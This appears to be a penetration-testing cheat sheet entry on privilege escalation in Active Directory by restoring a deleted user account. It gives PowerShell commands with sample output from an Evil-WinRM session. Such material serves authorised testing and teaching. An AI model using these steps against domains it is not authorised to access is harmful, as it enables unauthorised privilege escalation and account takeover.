Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Privesc #1: Restore deleted AD account
1. Import AD module
import-module activedirectory
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> import-module activedirectory
2. Query all deleted objects within domain
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Deleted : True
DistinguishedName : CN=Another User\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=example,DC=com
Name : Another User
DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass : user
ObjectGUID : ebe15df5-e265-45ec-b7fc-359877217138
3. Get all details for the deleted account
Get-ADObject -filter { SAMAccountName -eq '<DELETED_USER>' } -includeDeletedObjects -property *
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter { SAMAccountName -eq 'another.user' }
-includeDeletedObjects -property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : example.com/Deleted Objects/Another User
DEL:ebe15df5-e265-45ec-b7fc-359877217138
CN : Another User
DEL:ebe15df5-e265-45ec-b7fc-359877217138
...[SNIP]...
4. Restore the deleted account
# Rename the target account to avoid user exists error
Restore-ADObject -Identity <OBJECT_GUID> -NewName '<DELETED_USER>.2' -TargetPath 'CN=Users,DC=<EXAMPLE>,DC=<COM>'
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Restore-ADObject -Identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName 'Another User2' -TargetPath 'CN=Users,DC=EXAMPLE,DC=COM'